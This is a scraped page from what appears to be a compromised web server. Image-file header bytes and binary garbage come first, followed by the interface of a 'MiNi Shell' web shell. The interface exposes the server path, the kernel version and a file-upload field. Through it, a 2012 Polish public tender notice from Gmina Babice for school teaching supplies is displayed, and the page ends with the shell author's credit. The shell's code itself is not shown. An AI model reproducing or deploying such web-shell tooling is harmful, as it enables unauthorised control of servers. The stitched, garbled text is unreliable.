JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120719/260372-N-2012.html

<p class="kh_header"><b>Babice: Program indywidualizacji nauczania i wychowania uczniów klas I III szkół podstawowych z terenu Gminy Babice szansą na lepszą przyszłość i gwarantem skutecznej edukacji</b><br>
<b>Numer ogłoszenia: 260372 - 2012; data zamieszczenia: 19.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Babicach , ul. Krakowska 56, 32-551 Babice, woj. małopolskie, tel. 032 6134002, faks 032 6134013.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.babice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Program indywidualizacji nauczania i wychowania uczniów klas I III szkół podstawowych z terenu Gminy Babice szansą na lepszą przyszłość i gwarantem skutecznej edukacji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest zakup wraz z dostawą pomocy i materiałów dydaktycznych do placówek oświatowych Gminy Babice, niezbędnych do realizacji projektu pn. Program indywidualizacji nauczania i wychowania uczniów klas I III szkół podstawowych z terenu Gminy Babice szansą na lepszą przyszłość i gwarantem skutecznej edukacji współfinansowanego ze środków Unii Europejskiej w ramach  Europejskiego Funduszu Społecznego, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup    o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych w roku szkolnym 2012 2013 oraz w roku szkolnym 20132014 a bieżący nadzór nad realizacją projektu odpowiedzialni są Dyrektorzy Szkół a zarządzanie projektem powierzone zostało Dyrektorowi Gminnego Zespołu Szkół      i Przedszkoli w Babicach.
Przedmiot  zamówienia został podzielony na 21 części ze względu na miejsce dostarczenia przedmiotu  zamówienia (placówka oświatowa) oraz rodzaju dostarczanego asortymentu tzn. każdy z wykonawców może złożyć oferty na wszystkie części w poszczególnych zadaniach lub na poszczególne części z poszczególnych zadań.
Dostawa pomocy i materiałów dydaktycznych w ramach przedmiotowego zamówienia obejmuje:
1) Pomoce dydaktyczne
2) Artykuły sportowe
3) Sprzęt RTV
4) Programy multimedialne
5) Materiały biurowe
6) Meble, dywany.
Przedmiot zamówienia należy dostarczyć do niżej wymienionych placówek: 
1)Zadanie 1- Zespół Szkół w Babicach ul. Zamkowa 3 32-551 Babice, 
dostawa obejmuje następujący asortyment: 
Część I - Pomoce dydaktyczne 
Część II -Artykuły sportowe
Część III - Sprzęt RTV
Część IV Programy multimedialne
Część V - Materiały biurowe. 
Szczegółowy spis zakresu dostawy zawarty jest w Wykazie Nr 1 - Dostawa dla Zespołu  Szkół w Babicach ul. Zamkowa 3, 32-551 Babice na formularzu stanowiącym załącznik nr  1 do FORMULARZA OFERTY.  
2)Zadanie 2 - Zespół Szkół w Jankowicach  ul. Staszica 5 Jankowice,  
32-551 Babice, 
dostawa  obejmuje następujący asortyment: 
Część I - Pomoce dydaktyczne  
Część II -Artykuły sportowe
Część III - Sprzęt RTV
Część IV - Materiały biurowe 
Część V -  Meble, dywany - dostawa 2013r.
Szczegółowy spis zakresu dostawy zawarty jest w Wykazie Nr 2 - Dostawa dla Zespołu Szkół w Jankowicach ul. Staszica 5 Jankowice,  32-551 Babice na formularzu stanowiącym załącznik nr 2 do FORMULARZA OFERTY. 
3)adanie 3 - Zespół Szkół w Mętkowie ul. Ks. K. Wojtyły 21 Mętków,  
32-551 Babice, 
dostawa  obejmuje następujący asortyment: 
Część I - Pomoce dydaktyczne
Część II - Programy multimedialne
Część III - Artykuły sportowe. 
Szczegółowy spis zakresu dostawy zawarty jest w Wykazie Nr 3 - Dostawa dla Zespół Szkół  w Mętkowie ul. Ks. K. Wojtyły 21 Mętków,  32-551 Babice na formularzu stanowiącym załącznik nr  3 do FORMULARZA OFERTY.
4)Zadanie 4 - Szkoła Podstawowa w Rozkochowie  ul. Chemików  4  Rozkochów,  32-551 Babice, dostawa  obejmuje następujący asortyment: 
Część I - Pomoce dydaktyczne      
Część II -Artykuły sportowe
Część III - Sprzęt RTV - dostawa 2013r.
Część IV - Programy multimedialne
Część V - Materiały biurowe.  
Szczegółowy spis zakresu dostawy zawarty jest w Wykazie Nr 4 - Dostawa dla Szkoły  Podstawowej w Rozkochowie  ul. Chemików  4  Rozkochów, 32- 551 Babice na formularzu stanowiącym załącznik nr  4 do FORMULARZA OFERTY.
5)Zadanie 5 - Zespół Szkół w Zagórzu  ul. Piłsudskiego 139, 32-555 Zagórze, dostawa  obejmuje następujący asortyment:
Część I - Pomoce dydaktyczne 
Część II - Artykuły sportowe 
Część III -Sprzęt RTV.  
Szczegółowy spis zakresu dostawy zawarty jest w Wykazie Nr 5 - Dostawa dla Zespołu Szkół w Zagórzu ul. Piłsudskiego 139, 32-555 Zagórze na formularzu stanowiącym załącznik nr  5 do FORMULARZA OFERTY.
2.Jeżeli w szczegółowym wykazie pomocy dydaktycznych wskazano, że do realizacji niniejszego zamówienia należy dostarczyć produkty konkretnych producentów lub podano nazwę własną produktu, Zamawiający informuje, że dopuszcza dostawę produktów jakościowo równoważnych, spełniających równoważne parametry. Przez produkty równoważne Zamawiający rozumie produkty jednorodne pod względem dydaktycznym, o parametrach takich samych lub wyższych w stosunku do wskazanych w wykazie. Zamawiający dopuszcza oferowanie materiałów i urządzeń równoważnych pod warunkiem, że zagwarantują one wartości użytkowe zgodnie z zapisami SIWZ.
3.Podane parametry  określają wymagane minimalne parametry techniczne lub standardy jakościowe. Oferowane przez dostawców wyroby muszą odpowiadać minimum cechom i parametrom im równoważnym, posiadać minimalne określone przez Zamawiającego właściwości użytkowe i przyjęte standardy jakości. Oznaczenia i nazwy własne produktów służą wyłącznie do opisania minimalnych parametrów technicznych, które powinny spełniać te produkty, wskazania standardu jakościowego.
4.Zamawiający wymaga, żeby wszystkie elementy przedmiotu zamówienia, które tego wymagają były zaopatrzone w instrukcję w języku polskim.
5.Wszystkie towary muszą być fabrycznie nowe i wolne od wad oraz spełniać warunki określone dla produktów bezpiecznych.
6.Wszystkie towary muszą posiadać oryginalne opakowania producenta, opatrzone w etykiety identyfikujące dany produkt. Na każde żądanie Zmawiającego, Wykonawca jest zobowiązany okazać w stosunku do zamówienia odpowiedni certyfikat zgodności z polskimi Normami lub Normami Europejskimi, a także atest PZH, jeżeli posiadanie takich certyfikatów lub atestów będzie wymagane prawem.  
7.Wszystkie oferowane towary powinny posiadać wszelkie wymagane przepisami świadectwa, certyfikaty, atesty i inne dokumenty poświadczające dopuszczenie do stosowania w obiektach szkolnych.
8.Wszystkie artykuły będące przedmiotem zamówienia Wykonawca zobowiązany jest dostarczyć do miejsca wskazanego przez Dyrektora GZOSiP w Babicach oraz rozmieścić według wskazań Dyrektora danej szkoły. Noszenie materiałów objętych zamówieniem leży w obowiązkach wyłącznie wybranego wykonawcy. Każda dostawa będzie szczegółowo uzgodniona pomiędzy Zamawiającym a Wykonawcą. Termin dostawy należy każdorazowo ustalić /telefonicznie, elektronicznie, pisemnie lub faksem/ z Dyrektorem GZOSiP w Babicach, z co najmniej 2-dniowym wyprzedzeniem. Do odbioru przedmiotu zamówienia i podpisania protokołu końcowego odbioru w każdej ze szkół upoważniony będzie Dyrektor danej szkoły. Rozliczenia będą następowały po każdej części dostawy. Termin płatności faktur wystawionych na Gminny Zespół Obsługi Szkół i Przedszkoli w Babicach ustala się do 21 dni od daty otrzymania przez Zamawiającego. 
9.W przypadku stwierdzenia, że dostarczone artykuły są uszkodzone, posiadają wady uniemożliwiające używanie, a wady i uszkodzenie nie powstały z winy Zamawiającego, nie spełniają wymagań Zamawiającego określonych w szczegółowym opisie zamówienia lub dostarczone produkty równoważne nie odpowiadają pod względem jakości, trwałości, funkcjonalności oraz parametrów technicznych produktom wskazanym w SIWZ Wykonawca wymieni je na nowe, prawidłowe, na własny koszt w terminie 14 dni od zgłoszenia przez Zamawiającego.
10.Wykonawca udzieli na dostarczony przedmiot zamówienia gwarancji jakości na okres min. 12 miesięcy na materiały dydaktyczne i sprzęt audiowizualny od dnia odbioru dostawy. 
11. Za oryginalne są uznawane tonery wyprodukowane przez producentów urządzeń, w których będą stosowane, nie będące naśladownictwem lub przeróbką, nie fałszowane. Zamawiający dopuszcza składanie ofert równoważnych zgodnie z art. 29 ust 3 Ustawy. W takim przypadku udowodnienie, że oferowane przez Wykonawcę tonery, spełniają wymagania określone przez Zamawiającego, leży po stronie Wykonawcy. Za równoważne należy uznawać tonery fabrycznie nowe, których jakość, parametry techniczne, w tym wydajność, jest co najmniej taka, jak tonerów oryginalnych i posiada normę ISO 19752. W przypadku zaoferowania produktu równoważnego, Wykonawca zobowiązany jest do wskazania w formularzu ofertowym symbolu i nazwy producenta tonera. Produkt równoważny powinien być oznaczony na opakowaniu z nazwy, symbolu, producenta tonera, urządzenia, do którego jest przeznaczony. Po zainstalowaniu tonera w urządzeniu, nie może ono generować żadnych negatywnych komunikatów np. produkt nie sygnalizuje we właściwy sposób stanu zużycia tonera lub pokazuje komunikaty                            o nieoryginalności zastosowanego materiału, ani też nie może to w jakikolwiek negatywny sposób wpływać na pracę urządzenia, w którym produkt został zastosowany. Niespełnienie powyższych wymogów spowoduje uznanie tonerów za wadliwe. Oferowane tonery muszą być fabrycznie nowe, przy czym za fabrycznie nowe będą uznane artykuły, do produkcji których zostały wykorzystane półprodukty w 100% nowe, nie pochodzące z recyklingu, nie prefabrykowane, nie regenerowane i bez śladów używania oraz bez jakichkolwiek uszkodzeń. Tonery muszą być wyprodukowane po 1 stycznia 2011 r. i nie regenerowane..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.21.00-9, 30.19.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 21.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga się wniesienia wadium w przedmiotowym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie sprecyzował opisu sposobu dokonywania oceny spełnienia dla tego warunku w niniejszym postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie sprecyzował opisu sposobu dokonywania oceny spełnienia dla tego warunku w niniejszym postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie sprecyzował opisu sposobu dokonywania oceny spełnienia dla tego warunku w niniejszym postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie sprecyzował opisu sposobu dokonywania oceny spełnienia dla tego warunku w niniejszym postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie sprecyzował opisu sposobu dokonywania oceny spełnienia dla tego warunku w niniejszym postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu, z którego wynika zakres reprezentacji, podpisane przez osoby uprawnione do reprezentowania Wykonawcy, jeżeli wykonawca jest reprezentowany przez pełnomocnika. 
2.Pełnomocnictwo do reprezentowania w przedmiotowym postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia. 
3.Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, wystawiony nie wcześniej niż 6 miesięcy przed upływem  terminu składania ofert.
4. Parafowany projekt umowy - załącznik nr 3 do SIWZ
5.Wykaz podwykonawców - załącznik nr 4 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian  postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru wykonawcy oraz określa warunki tej zmiany w następujących okolicznościach: 
-zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, np. zmiana  stawki urzędowej podatku VAT
-termin realizacji zamówienia może ulec zmianie w przypadku wystąpienia problemów z dotrzymaniem terminu dostawy na uzasadniony wniosek Wykonawcy, pod warunkiem, że zmiana ta wynika z okoliczności, których Wykonawca nie mógł przewidzieć na etapie składania oferty i nie jest  przez niego zawiniona
-z powodu okoliczności siły wyższej.
Wprowadzenie powyższych zmian wymaga formy pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.babice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Babicach
ul.Krakowska 56, 32-551 Babice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2012 godzina 09:00, miejsce: Urząd Gminy w Babicach
ul.Krakowska 56, 32-551 Babice
Dziennik Podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany jest ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. 
Priorytet IX. Rozwój wykształcenia i kompetencji w regionach
Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty
Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com